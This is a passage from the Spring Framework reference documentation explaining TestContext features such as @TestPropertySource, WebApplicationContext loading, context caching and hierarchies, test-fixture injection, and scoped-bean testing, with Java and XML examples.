one\n`.properties` or `.xml` resource.\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t@ContextConfiguration\n\t@TestPropertySource(\"\/test.properties\")\n\tpublic class MyIntegrationTests {\n\t\t\/\/ class body...\n\t}\n----\n\n_Inlined_ properties in the form of key-value pairs can be configured via the\n`properties` attribute of `@TestPropertySource` as shown in the following example. All\nkey-value pairs will be added to the enclosing `Environment` as a single test\n`PropertySource` with the highest precedence.\n\nThe supported syntax for key-value pairs is the same as the syntax defined for entries in\na Java properties file:\n\n* `\"key=value\"`\n* `\"key:value\"`\n* `\"key value\"`\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t@ContextConfiguration\n\t@TestPropertySource(properties = {\"timezone = GMT\", \"port: 4242\"})\n\tpublic class MyIntegrationTests {\n\t\t\/\/ class body...\n\t}\n----\n\n*Default properties file detection*\n\nIf `@TestPropertySource` is declared as an empty annotation (i.e., without explicit\nvalues for the `locations` or `properties` attributes), an attempt will be made to detect\na _default_ properties file relative to the class that declared the annotation. For\nexample, if the annotated test class is `com.example.MyTest`, the corresponding default\nproperties file is `\"classpath:com\/example\/MyTest.properties\"`. If the default cannot be\ndetected, an `IllegalStateException` will be thrown.\n\n*Precedence*\n\nTest property sources have higher precedence than those loaded from the operating\nsystem's environment or Java system properties as well as property sources added by the\napplication declaratively via `@PropertySource` or programmatically. Thus, test property\nsources can be used to selectively override properties defined in system and application\nproperty sources. Furthermore, inlined properties have higher precedence than properties\nloaded from resource locations.\n\nIn the following example, the `timezone` and `port` properties as well as any properties\ndefined in `\"\/test.properties\"` will override any properties of the same name that are\ndefined in system and application property sources. Furthermore, if the\n`\"\/test.properties\"` file defines entries for the `timezone` and `port` properties those\nwill be overridden by the _inlined_ properties declared via the `properties` attribute.\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t@ContextConfiguration\n\t@TestPropertySource(\n\t\tlocations = \"\/test.properties\",\n\t\tproperties = {\"timezone = GMT\", \"port: 4242\"}\n\t)\n\tpublic class MyIntegrationTests {\n\t\t\/\/ class body...\n\t}\n----\n\n*Inheriting and overriding test property sources*\n\n`@TestPropertySource` supports boolean `inheritLocations` and `inheritProperties`\nattributes that denote whether resource locations for properties files and inlined\nproperties declared by superclasses should be __inherited__. The default value for both\nflags is `true`. This means that a test class inherits the locations and inlined\nproperties declared by any superclasses. Specifically, the locations and inlined\nproperties for a test class are appended to the locations and inlined properties declared\nby superclasses. Thus, subclasses have the option of __extending__ the locations and\ninlined properties. Note that properties that appear later will __shadow__ (i.e..,\noverride) properties of the same name that appear earlier. In addition, the\naforementioned precedence rules apply for inherited test property sources as well.\n\nIf the `inheritLocations` or `inheritProperties` attribute in `@TestPropertySource` is set\nto `false`, the locations or inlined properties, respectively, for the test class __shadow__\nand effectively replace the configuration defined by superclasses.\n\nIn the following example, the `ApplicationContext` for `BaseTest` will be loaded using\nonly the `\"base.properties\"` file as a test property source. In contrast, the\n`ApplicationContext` for `ExtendedTest` will be loaded using the `\"base.properties\"`\n**and** `\"extended.properties\"` files as test property source locations.\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t@TestPropertySource(\"base.properties\")\n\t@ContextConfiguration\n\tpublic class BaseTest {\n\t\t\/\/ ...\n\t}\n\n\t@TestPropertySource(\"extended.properties\")\n\t@ContextConfiguration\n\tpublic class ExtendedTest extends BaseTest {\n\t\t\/\/ ...\n\t}\n----\n\nIn the following example, the `ApplicationContext` for `BaseTest` will be loaded using only\nthe _inlined_ `key1` property. In contrast, the `ApplicationContext` for `ExtendedTest` will be\nloaded using the _inlined_ `key1` and `key2` properties.\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t@TestPropertySource(properties = \"key1 = value1\")\n\t@ContextConfiguration\n\tpublic class BaseTest {\n\t\t\/\/ ...\n\t}\n\n\t@TestPropertySource(properties = \"key2 = value2\")\n\t@ContextConfiguration\n\tpublic class ExtendedTest extends BaseTest {\n\t\t\/\/ ...\n\t}\n----\n\n[[testcontext-ctx-management-web]]\n===== Loading a WebApplicationContext\nSpring 3.2 introduced support for loading a `WebApplicationContext` in integration\ntests. To instruct the TestContext framework to load a `WebApplicationContext` instead\nof a standard `ApplicationContext`, simply annotate the respective test class with\n`@WebAppConfiguration`.\n\nThe presence of `@WebAppConfiguration` on your test class instructs the TestContext\nframework (TCF) that a `WebApplicationContext` (WAC) should be loaded for your\nintegration tests. In the background the TCF makes sure that a `MockServletContext` is\ncreated and supplied to your test's WAC. By default the base resource path for your\n`MockServletContext` will be set to __\"src\/main\/webapp\"__. This is interpreted as a path\nrelative to the root of your JVM (i.e., normally the path to your project). If you're\nfamiliar with the directory structure of a web application in a Maven project, you'll\nknow that __\"src\/main\/webapp\"__ is the default location for the root of your WAR. If you\nneed to override this default, simply provide an alternate path to the\n`@WebAppConfiguration` annotation (e.g., `@WebAppConfiguration(\"src\/test\/webapp\")`). If\nyou wish to reference a base resource path from the classpath instead of the file\nsystem, just use Spring's __classpath:__ prefix.\n\nPlease note that Spring's testing support for `WebApplicationContexts` is on par with its\nsupport for standard `ApplicationContexts`. When testing with a `WebApplicationContext`\nyou are free to declare XML configuration files, Groovy scripts, or `@Configuration`\nclasses via `@ContextConfiguration`. You are of course also free to use any other test\nannotations such as `@ActiveProfiles`, `@TestExecutionListeners`, `@Sql`, `@Rollback`,\netc.\n\nThe following examples demonstrate some of the various configuration options for loading\na `WebApplicationContext`.\n\n.Conventions\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t@RunWith(SpringRunner.class)\n\n\t\/\/ defaults to \"file:src\/main\/webapp\"\n\t@WebAppConfiguration\n\n\t\/\/ detects \"WacTests-context.xml\" in same package\n\t\/\/ or static nested @Configuration class\n\t@ContextConfiguration\n\n\tpublic class WacTests {\n\t\t\/\/...\n\t}\n----\n\nThe above example demonstrates the TestContext framework's support for __convention over\nconfiguration__. If you annotate a test class with `@WebAppConfiguration` without\nspecifying a resource base path, the resource path will effectively default\nto __\"file:src\/main\/webapp\"__. Similarly, if you declare `@ContextConfiguration` without\nspecifying resource `locations`, annotated `classes`, or context `initializers`, Spring\nwill attempt to detect the presence of your configuration using conventions\n(i.e., __\"WacTests-context.xml\"__ in the same package as the `WacTests` class or static\nnested `@Configuration` classes).\n\n.Default resource semantics\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t@RunWith(SpringRunner.class)\n\n\t\/\/ file system resource\n\t@WebAppConfiguration(\"webapp\")\n\n\t\/\/ classpath resource\n\t@ContextConfiguration(\"\/spring\/test-servlet-config.xml\")\n\n\tpublic class WacTests {\n\t\t\/\/...\n\t}\n----\n\nThis example demonstrates how to explicitly declare a resource base path with\n`@WebAppConfiguration` and an XML resource location with `@ContextConfiguration`. The\nimportant thing to note here is the different semantics for paths with these two\nannotations. By default, `@WebAppConfiguration` resource paths are file system based;\nwhereas, `@ContextConfiguration` resource locations are classpath based.\n\n.Explicit resource semantics\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t@RunWith(SpringRunner.class)\n\n\t\/\/ classpath resource\n\t@WebAppConfiguration(\"classpath:test-web-resources\")\n\n\t\/\/ file system resource\n\t@ContextConfiguration(\"file:src\/main\/webapp\/WEB-INF\/servlet-config.xml\")\n\n\tpublic class WacTests {\n\t\t\/\/...\n\t}\n----\n\nIn this third example, we see that we can override the default resource semantics for\nboth annotations by specifying a Spring resource prefix. Contrast the comments in this\nexample with the previous example.\n\n.[[testcontext-ctx-management-web-mocks]]Working with Web Mocks\n--\nTo provide comprehensive web testing support, Spring 3.2 introduced a\n`ServletTestExecutionListener` that is enabled by default. When testing against a\n`WebApplicationContext` this <<testcontext-key-abstractions,TestExecutionListener>> sets\nup default thread-local state via Spring Web's `RequestContextHolder` before each test\nmethod and creates a `MockHttpServletRequest`, `MockHttpServletResponse`, and\n`ServletWebRequest` based on the base resource path configured via\n`@WebAppConfiguration`. `ServletTestExecutionListener` also ensures that the\n`MockHttpServletResponse` and `ServletWebRequest` can be injected into the test\ninstance, and once the test is complete it cleans up thread-local state.\n\nOnce you have a `WebApplicationContext` loaded for your test you might find that you\nneed to interact with the web mocks -- for example, to set up your test fixture or to\nperform assertions after invoking your web component. The following example demonstrates\nwhich mocks can be autowired into your test instance. Note that the\n`WebApplicationContext` and `MockServletContext` are both cached across the test suite;\nwhereas, the other mocks are managed per test method by the\n`ServletTestExecutionListener`.\n\n.Injecting mocks\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t@WebAppConfiguration\n\t@ContextConfiguration\n\tpublic class WacTests {\n\n\t\t@Autowired\n\t\tWebApplicationContext wac; \/\/ cached\n\n\t\t@Autowired\n\t\tMockServletContext servletContext; \/\/ cached\n\n\t\t@Autowired\n\t\tMockHttpSession session;\n\n\t\t@Autowired\n\t\tMockHttpServletRequest request;\n\n\t\t@Autowired\n\t\tMockHttpServletResponse response;\n\n\t\t@Autowired\n\t\tServletWebRequest webRequest;\n\n\t\t\/\/...\n\t}\n----\n--\n\n[[testcontext-ctx-management-caching]]\n===== Context caching\n\nOnce the TestContext framework loads an `ApplicationContext` (or `WebApplicationContext`)\nfor a test, that context will be cached and reused for __all__ subsequent tests that\ndeclare the same unique context configuration within the same test suite. To understand\nhow caching works, it is important to understand what is meant by __unique__ and __test\nsuite__.\n\nAn `ApplicationContext` can be __uniquely__ identified by the combination of\nconfiguration parameters that are used to load it. Consequently, the unique combination\nof configuration parameters are used to generate a __key__ under which the context is\ncached. The TestContext framework uses the following configuration parameters to build\nthe context cache key:\n\n* `locations` __(from @ContextConfiguration)__\n* `classes` __(from @ContextConfiguration)__\n* `contextInitializerClasses` __(from @ContextConfiguration)__\n* `contextCustomizers` __(from ContextCustomizerFactory)__\n* `contextLoader` __(from @ContextConfiguration)__\n* `parent` __(from @ContextHierarchy)__\n* `activeProfiles` __(from @ActiveProfiles)__\n* `propertySourceLocations` __(from @TestPropertySource)__\n* `propertySourceProperties` __(from @TestPropertySource)__\n* `resourceBasePath` __(from @WebAppConfiguration)__\n\nFor example, if `TestClassA` specifies `{\"app-config.xml\", \"test-config.xml\"}` for the\n`locations` (or `value`) attribute of `@ContextConfiguration`, the TestContext framework\nwill load the corresponding `ApplicationContext` and store it in a `static` context cache\nunder a key that is based solely on those locations. So if `TestClassB` also defines\n`{\"app-config.xml\", \"test-config.xml\"}` for its locations (either explicitly or\nimplicitly through inheritance) but does not define `@WebAppConfiguration`, a different\n`ContextLoader`, different active profiles, different context initializers, different\ntest property sources, or a different parent context, then the same `ApplicationContext`\nwill be shared by both test classes. This means that the setup cost for loading an\napplication context is incurred only once (per test suite), and subsequent test execution\nis much faster.\n\n.Test suites and forked processes\n[NOTE]\n====\nThe Spring TestContext framework stores application contexts in a __static__ cache. This\nmeans that the context is literally stored in a `static` variable. In other words, if\ntests execute in separate processes the static cache will be cleared between each test\nexecution, and this will effectively disable the caching mechanism.\n\nTo benefit from the caching mechanism, all tests must run within the same process or\ntest suite. This can be achieved by executing all tests as a group within an IDE.\nSimilarly, when executing tests with a build framework such as Ant, Maven, or Gradle it\nis important to make sure that the build framework does not __fork__ between tests. For\nexample, if the\nhttp:\/\/maven.apache.org\/plugins\/maven-surefire-plugin\/test-mojo.html#forkMode[forkMode]\nfor the Maven Surefire plug-in is set to `always` or `pertest`, the TestContext\nframework will not be able to cache application contexts between test classes and the\nbuild process will run significantly slower as a result.\n====\n\nSince having a large number of application contexts loaded within a given test suite can\ncause the suite to take an unnecessarily long time to execute, it is often beneficial to\nknow exactly how many contexts have been loaded and cached. To view the statistics for\nthe underlying context cache, simply set the log level for the\n`org.springframework.test.context.cache` logging category to `DEBUG`.\n\nIn the unlikely case that a test corrupts the application context and requires reloading\n-- for example, by modifying a bean definition or the state of an application object --\nyou can annotate your test class or test method with `@DirtiesContext` (see the\ndiscussion of `@DirtiesContext` in <<integration-testing-annotations-spring>>). This\ninstructs Spring to remove the context from the cache and rebuild the application\ncontext before executing the next test. Note that support for the `@DirtiesContext`\nannotation is provided by the `DirtiesContextBeforeModesTestExecutionListener` and the\n`DirtiesContextTestExecutionListener` which are enabled by default.\n\n\n[[testcontext-ctx-management-ctx-hierarchies]]\n===== Context hierarchies\n\nWhen writing integration tests that rely on a loaded Spring `ApplicationContext`, it is\noften sufficient to test against a single context; however, there are times when it is\nbeneficial or even necessary to test against a hierarchy of ++ApplicationContext++s. For\nexample, if you are developing a Spring MVC web application you will typically have a\nroot `WebApplicationContext` loaded via Spring's `ContextLoaderListener` and a child\n`WebApplicationContext` loaded via Spring's `DispatcherServlet`. This results in a\nparent-child context hierarchy where shared components and infrastructure configuration\nare declared in the root context and consumed in the child context by web-specific\ncomponents. Another use case can be found in Spring Batch applications where you often\nhave a parent context that provides configuration for shared batch infrastructure and a\nchild context for the configuration of a specific batch job.\n\nSince Spring Framework 3.2.2, it is possible to write integration tests that use context\nhierarchies by declaring context configuration via the `@ContextHierarchy` annotation,\neither on an individual test class or within a test class hierarchy. If a context\nhierarchy is declared on multiple classes within a test class hierarchy it is also\npossible to merge or override the context configuration for a specific, named level in\nthe context hierarchy. When merging configuration for a given level in the hierarchy the\nconfiguration resource type (i.e., XML configuration files or annotated classes) must be\nconsistent; otherwise, it is perfectly acceptable to have different levels in a context\nhierarchy configured using different resource types.\n\nThe following JUnit-based examples demonstrate common configuration scenarios for\nintegration tests that require the use of context hierarchies.\n\n.Single test class with context hierarchy\n--\n`ControllerIntegrationTests` represents a typical integration testing scenario for a\nSpring MVC web application by declaring a context hierarchy consisting of two levels,\none for the __root__ WebApplicationContext (loaded using the `TestAppConfig`\n`@Configuration` class) and one for the __dispatcher servlet__ `WebApplicationContext`\n(loaded using the `WebConfig` `@Configuration` class). The `WebApplicationContext` that\nis __autowired__ into the test instance is the one for the child context (i.e., the\nlowest context in the hierarchy).\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t@RunWith(SpringRunner.class)\n\t@WebAppConfiguration\n\t@ContextHierarchy({\n\t\t@ContextConfiguration(classes = TestAppConfig.class),\n\t\t@ContextConfiguration(classes = WebConfig.class)\n\t})\n\tpublic class ControllerIntegrationTests {\n\n\t\t@Autowired\n\t\tprivate WebApplicationContext wac;\n\n\t\t\/\/ ...\n\t}\n----\n\n--\n\n\n.Class hierarchy with implicit parent context\n--\nThe following test classes define a context hierarchy within a test class hierarchy.\n`AbstractWebTests` declares the configuration for a root `WebApplicationContext` in a\nSpring-powered web application. Note, however, that `AbstractWebTests` does not declare\n`@ContextHierarchy`; consequently, subclasses of `AbstractWebTests` can optionally\nparticipate in a context hierarchy or simply follow the standard semantics for\n`@ContextConfiguration`. `SoapWebServiceTests` and `RestWebServiceTests` both extend\n`AbstractWebTests` and define a context hierarchy via `@ContextHierarchy`. The result is\nthat three application contexts will be loaded (one for each declaration of\n`@ContextConfiguration`), and the application context loaded based on the configuration\nin `AbstractWebTests` will be set as the parent context for each of the contexts loaded\nfor the concrete subclasses.\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t@RunWith(SpringRunner.class)\n\t@WebAppConfiguration\n\t@ContextConfiguration(\"file:src\/main\/webapp\/WEB-INF\/applicationContext.xml\")\n\tpublic abstract class AbstractWebTests {}\n\n\t@ContextHierarchy(@ContextConfiguration(\"\/spring\/soap-ws-config.xml\")\n\tpublic class SoapWebServiceTests extends AbstractWebTests {}\n\n\t@ContextHierarchy(@ContextConfiguration(\"\/spring\/rest-ws-config.xml\")\n\tpublic class RestWebServiceTests extends AbstractWebTests {}\n----\n--\n\n\n.Class hierarchy with merged context hierarchy configuration\n--\nThe following classes demonstrate the use of __named__ hierarchy levels in order to\n__merge__ the configuration for specific levels in a context hierarchy. `BaseTests`\ndefines two levels in the hierarchy, `parent` and `child`. `ExtendedTests` extends\n`BaseTests` and instructs the Spring TestContext Framework to merge the context\nconfiguration for the `child` hierarchy level, simply by ensuring that the names\ndeclared via the `name` attribute in `@ContextConfiguration` are both `\"child\"`. The\nresult is that three application contexts will be loaded: one for `\"\/app-config.xml\"`,\none for `\"\/user-config.xml\"`, and one for `{\"\/user-config.xml\", \"\/order-config.xml\"}`.\nAs with the previous example, the application context loaded from `\"\/app-config.xml\"`\nwill be set as the parent context for the contexts loaded from `\"\/user-config.xml\"`\nand `{\"\/user-config.xml\", \"\/order-config.xml\"}`.\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t@RunWith(SpringRunner.class)\n\t@ContextHierarchy({\n\t\t@ContextConfiguration(name = \"parent\", locations = \"\/app-config.xml\"),\n\t\t@ContextConfiguration(name = \"child\", locations = \"\/user-config.xml\")\n\t})\n\tpublic class BaseTests {}\n\n\t@ContextHierarchy(\n\t\t@ContextConfiguration(name = \"child\", locations = \"\/order-config.xml\")\n\t)\n\tpublic class ExtendedTests extends BaseTests {}\n----\n--\n\n.Class hierarchy with overridden context hierarchy configuration\n--\nIn contrast to the previous example, this example demonstrates how to __override__ the\nconfiguration for a given named level in a context hierarchy by setting the\n`inheritLocations` flag in `@ContextConfiguration` to `false`. Consequently, the\napplication context for `ExtendedTests` will be loaded only from\n`\"\/test-user-config.xml\"` and will have its parent set to the context loaded from\n`\"\/app-config.xml\"`.\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t@RunWith(SpringRunner.class)\n\t@ContextHierarchy({\n\t\t@ContextConfiguration(name = \"parent\", locations = \"\/app-config.xml\"),\n\t\t@ContextConfiguration(name = \"child\", locations = \"\/user-config.xml\")\n\t})\n\tpublic class BaseTests {}\n\n\t@ContextHierarchy(\n\t\t@ContextConfiguration(\n\t\t\tname = \"child\",\n\t\t\tlocations = \"\/test-user-config.xml\",\n\t\t\tinheritLocations = false\n\t))\n\tpublic class ExtendedTests extends BaseTests {}\n----\n\n.Dirtying a context within a context hierarchy\n[NOTE]\n====\nIf `@DirtiesContext` is used in a test whose context is configured as part of a context\nhierarchy, the `hierarchyMode` flag can be used to control how the context cache is\ncleared. For further details consult the discussion of `@DirtiesContext` in\n<<integration-testing-annotations-spring,Spring Testing Annotations>> and the\n`@DirtiesContext` javadocs.\n====\n--\n\n\n[[testcontext-fixture-di]]\n==== Dependency injection of test fixtures\nWhen you use the `DependencyInjectionTestExecutionListener` -- which is configured by\ndefault -- the dependencies of your test instances are __injected__ from beans in the\napplication context that you configured with `@ContextConfiguration`. You may use setter\ninjection, field injection, or both, depending on which annotations you choose and\nwhether you place them on setter methods or fields. For consistency with the annotation\nsupport introduced in Spring 2.5 and 3.0, you can use Spring's `@Autowired` annotation\nor the `@Inject` annotation from JSR 330.\n\n[TIP]\n====\n\nThe TestContext framework does not instrument the manner in which a test instance is\ninstantiated. Thus the use of `@Autowired` or `@Inject` for constructors has no effect\nfor test classes.\n====\n\nBecause `@Autowired` is used to perform <<beans-factory-autowire, __autowiring by type__\n>>, if you have multiple bean definitions of the same type, you cannot rely on this\napproach for those particular beans. In that case, you can use `@Autowired` in\nconjunction with `@Qualifier`. As of Spring 3.0 you may also choose to use `@Inject` in\nconjunction with `@Named`. Alternatively, if your test class has access to its\n`ApplicationContext`, you can perform an explicit lookup by using (for example) a call\nto `applicationContext.getBean(\"titleRepository\")`.\n\nIf you do not want dependency injection applied to your test instances, simply do not\nannotate fields or setter methods with `@Autowired` or `@Inject`. Alternatively, you can\ndisable dependency injection altogether by explicitly configuring your class with\n`@TestExecutionListeners` and omitting `DependencyInjectionTestExecutionListener.class`\nfrom the list of listeners.\n\nConsider the scenario of testing a `HibernateTitleRepository` class, as outlined in the\n<<integration-testing-goals,Goals>> section. The next two code listings demonstrate the\nuse of `@Autowired` on fields and setter methods. The application context configuration\nis presented after all sample code listings.\n\n[NOTE]\n====\nThe dependency injection behavior in the following code listings is not specific to\nJUnit. The same DI techniques can be used in conjunction with any testing framework.\n\nThe following examples make calls to static assertion methods such as `assertNotNull()`\nbut without prepending the call with `Assert`. In such cases, assume that the method was\nproperly imported through an `import static` declaration that is not shown in the\nexample.\n====\n\nThe first code listing shows a JUnit-based implementation of the test class that uses\n`@Autowired` for field injection.\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t@RunWith(SpringRunner.class)\n\t\/\/ specifies the Spring configuration to load for this test fixture\n\t**@ContextConfiguration(\"repository-config.xml\")**\n\tpublic class HibernateTitleRepositoryTests {\n\n\t\t\/\/ this instance will be dependency injected by type\n\t\t**@Autowired**\n\t\tprivate HibernateTitleRepository titleRepository;\n\n\t\t@Test\n\t\tpublic void findById() {\n\t\t\tTitle title = titleRepository.findById(new Long(10));\n\t\t\tassertNotNull(title);\n\t\t}\n\t}\n----\n\nAlternatively, you can configure the class to use `@Autowired` for setter injection as\nseen below.\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t@RunWith(SpringRunner.class)\n\t\/\/ specifies the Spring configuration to load for this test fixture\n\t**@ContextConfiguration(\"repository-config.xml\")**\n\tpublic class HibernateTitleRepositoryTests {\n\n\t\t\/\/ this instance will be dependency injected by type\n\t\tprivate HibernateTitleRepository titleRepository;\n\n\t\t**@Autowired**\n\t\tpublic void setTitleRepository(HibernateTitleRepository titleRepository) {\n\t\t\tthis.titleRepository = titleRepository;\n\t\t}\n\n\t\t@Test\n\t\tpublic void findById() {\n\t\t\tTitle title = titleRepository.findById(new Long(10));\n\t\t\tassertNotNull(title);\n\t\t}\n\t}\n----\n\nThe preceding code listings use the same XML context file referenced by the\n`@ContextConfiguration` annotation (that is, `repository-config.xml`), which looks like\nthis:\n\n[source,xml,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t<?xml version=\"1.0\" encoding=\"UTF-8\"?>\n\t<beans xmlns=\"http:\/\/www.springframework.org\/schema\/beans\"\n\t\txmlns:xsi=\"http:\/\/www.w3.org\/2001\/XMLSchema-instance\"\n\t\txsi:schemaLocation=\"http:\/\/www.springframework.org\/schema\/beans\n\t\t\thttp:\/\/www.springframework.org\/schema\/beans\/spring-beans.xsd\">\n\n\t\t<!-- this bean will be injected into the HibernateTitleRepositoryTests class -->\n\t\t<bean id=\"**titleRepository**\" class=\"**com.foo.repository.hibernate.HibernateTitleRepository**\">\n\t\t\t<property name=\"sessionFactory\" ref=\"sessionFactory\"\/>\n\t\t<\/bean>\n\n\t\t<bean id=\"sessionFactory\" class=\"org.springframework.orm.hibernate5.LocalSessionFactoryBean\">\n\t\t\t<!-- configuration elided for brevity -->\n\t\t<\/bean>\n\n\t<\/beans>\n----\n\n[NOTE]\n====\nIf you are extending from a Spring-provided test base class that happens to use\n`@Autowired` on one of its setter methods, you might have multiple beans of the affected\ntype defined in your application context: for example, multiple `DataSource` beans. In\nsuch a case, you can override the setter method and use the `@Qualifier` annotation to\nindicate a specific target bean as follows, but make sure to delegate to the overridden\nmethod in the superclass as well.\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t\/\/ ...\n\n\t\t@Autowired\n\t\t@Override\n\t\tpublic void setDataSource(**@Qualifier(\"myDataSource\")** DataSource dataSource) {\n\t\t\t**super**.setDataSource(dataSource);\n\t\t}\n\n\t\/\/ ...\n----\n\nThe specified qualifier value indicates the specific `DataSource` bean to inject,\nnarrowing the set of type matches to a specific bean. Its value is matched against\n`<qualifier>` declarations within the corresponding `<bean>` definitions. The bean name\nis used as a fallback qualifier value, so you may effectively also point to a specific\nbean by name there (as shown above, assuming that \"myDataSource\" is the bean id).\n====\n\n\n[[testcontext-web-scoped-beans]]\n==== Testing request and session scoped beans\n\n<<beans-factory-scopes-other,Request and session scoped beans>> have been supported by\nSpring since the early years, and since Spring 3.2 it's a breeze to test your\nrequest-scoped and session-scoped beans by following these steps.\n\n* Ensure that a `WebApplicationContext` is loaded for your test by annotating your test\n class with `@WebAppConfiguration`.\n* Inject the mock request or session into your test instance and prepare your test\n fixture as appropriate.\n* Invoke your web component that you retrieved from the configured\n `WebApplicationContext` (i.e., via dependency injection).\n* Perform assertions against the mocks.\n\nThe following code snippet displays the XML configuration for a login use case. Note\nthat the `userService` bean has a dependency on a request-scoped `loginAction` bean.\nAlso, the `LoginAction` is instantiated using <<expressions,SpEL expressions>> that\nretrieve the username and password from the current HTTP request. In our test, we will\nwant to configure these request parameters via the mock managed by the TestContext\nframework.\n\n.Request-scoped bean configuration\n[source,xml,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t<beans>\n\n\t\t<bean id=\"userService\"\n\t\t\t\tclass=\"com.example.SimpleUserService\"\n\t\t\t\tc:loginAction-ref=\"loginAction\" \/>\n\n\t\t<bean id=\"loginAction\" class=\"com.example.LoginAction\"\n\t\t\t\tc:username=\"#{request.getParameter('user')}\"\n\t\t\t\tc:password=\"#{request.getParameter('pswd')}\"\n\t\t\t\tscope=\"request\">\n\t\t\t<aop:scoped-proxy \/>\n\t\t<\/bean>\n\n\t<\/beans>\n----\n\nIn `RequestScopedBeanTests` we inject both the `UserService` (i.e., the subject under\ntest) and the `MockHttpServletRequest` into our test instance. Within our\n`requestScope()` test method we set up our test fixture by setting request parameters in\nthe provided `MockHttpServletRequest`. When the `loginUser()` method is invoked on our\n`userService` we are assured that the user service has access to the request-scoped\n`loginAction` for the current `MockHttpServletRequest` (i.e., the one we just set\nparameters in). We can then perform assertions against the results based on the known\ninputs for the username and password.\n\n.Request-scoped bean test\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t@RunWith(SpringRunner.class)\n\t@ContextConfiguration\n\t@WebAppConfiguration\n\tpublic class RequestScopedBeanTests {\n\n\t\t@Autowired UserService userService;\n\t\t@Autowired MockHttpServletRequest request;\n\n\t\t@Test\n\t\tpublic void requestScope() {\n\n\t\t\trequest.setParameter(\"user\", \"enigma\");\n\t\t\trequest.setParameter(\"pswd\", \"$pr!ng\");\n\n\t\t\tLoginResults results = userService.loginUser();\n\n\t\t\t\/\/ assert results\n\t\t}\n\t}\n----\n\nThe following code snippet is similar to the one we saw above for a request-scoped bean;\nhowever, this time the `userService` bean has a dependency on a session-scoped\n`userPreferences` bean. Note that the `UserPreferences` bean is instantiated using a\nSpEL expression that retrieves the __theme__ from the current HTTP session. In our test,\nwe will need to configure a theme in the mock session managed by the TestContext\nframework.\n\n.Session-scoped bean configuration\n[source,xml,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t<beans>\n\n\t\t<bean id=\"userService\"\n\t\t\t\tclass=\"com.example.SimpleUserService\"\n\t\t\t\tc:userPreferences-ref=\"userPreferences\" \/>\n\n\t\t<bean id=\"userPreferences\"\n\t\t\t\tclass=\"com.example.UserPreferences\"\n\t\t\t\tc:theme=\"#{session.getAttribute('theme')}\"\n\t\t\t\tscope=\"session\">\n\t\t\t<aop:scoped-proxy \/>\n\t\t<\/bean>\n\n\t<\/beans>\n----\n\nIn `SessionScopedBeanTests` we inject the `UserService` and the `MockHttpSession` into\nour test instance. Within our `sessionScope()` test method we set up our test fixture by\nsetting the expected \"theme\" attribute in the provided `MockHttpSession`. When the\n`processUserPreferences()` method is invoked on our `userService` we are assured that\nthe user service has access to the session-scoped `userPreferences` for the current\n`MockHttpSession`, and we can perform assertions against the results based on the\nconfigured theme.\n\n.Session-scoped bean test\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t@RunWith(SpringRunner.class)\n\t@ContextConfiguration\n\t@WebAppConfiguration\n\tpublic class SessionScopedBeanTests {\n\n\t\t@Autowired UserService userService;\n\t\t@Autowired MockHttpSession session;\n\n\t\t@Test\n\t\tpublic void sessionScope() throws Exception {\n\n\t\t\tsession.setAttribute(\"theme\", \"blue\");\n\n\t\t\tResults results = userService.processUserPreferences();\n\n\t\t\t\/\/ assert results\n\t\t}\n\t}\n----\n\n[[testcontext-tx]]\n==== Transaction management\n\nIn the TestContext framework, transactions are managed by the\n`TransactionalTestExecutionListener` which is configured by default, even if you do not\nexplicitly declare `@TestExecutionListeners` on your test class. To enable support for\ntransactions, however, you must configure a `PlatformTransactionManager` bean in the\n`ApplicationContext` that is loaded via `@ContextConfiguration` semantics (further\ndetails are provided below). In addition, you must declare Spring's `@Transactional`\nannotation either at the class or method level for your tests.\n\n[[testcontext-tx-test-managed-transactions]]\n===== Test-managed transactions\n\n_Test-managed transactions_ are transactions that are managed _declaratively_ via the\n`TransactionalTestExecutionListener` or _programmatically_ via `TestTransaction` (see\nbelow). Such transactions should not be confused with _Spring-managed transactions_\n(i.e., those managed directly by Spring within the `ApplicationContext` loaded for tests)\nor _application-managed transactions_ (i.e., those managed programmatically within\napplication code that is invoked via tests). Spring-managed and application-managed\ntransactions will typically participate in test-managed transactions; however, caution\nshould be taken if Spring-managed or application-managed transactions are configured with\nany _propagation_ type other than `REQUIRED` or `SUPPORTS` (see the discussion on\n<<tx-propagation,transaction propagation>> for details).\n\n[[testcontext-tx-enabling-transactions]]\n===== Enabling and disabling transactions\n\nAnnotating a test method with `@Transactional` causes the test to be run within a\ntransaction that will, by default, be automatically rolled back after completion of the\ntest. If a test class is annotated with `@Transactional`, each test method within that\nclass hierarchy will be run within a transaction. Test methods that are not annotated\nwith `@Transactional` (at the class or method level) will not be run within a\ntransaction. Furthermore, tests that are annotated with `@Transactional` but have the\n`propagation` type set to `NOT_SUPPORTED` will not be run within a transaction.\n\n__Note that <<testcontext-support-classes-junit4,\n`AbstractTransactionalJUnit4SpringContextTests`>> and\n<<testcontext-support-classes-testng, `AbstractTransactionalTestNGSpringContextTests`>>\nare preconfigured for transactional support at the class level.__\n\nThe following example demonstrates a common scenario for writing an integration test for\na Hibernate-based `UserRepository`. As explained in\n<<testcontext-tx-rollback-and-commit-behavior>>, there is no need to clean up the\ndatabase after the `createUser()` method is executed since any changes made to the\ndatabase will be 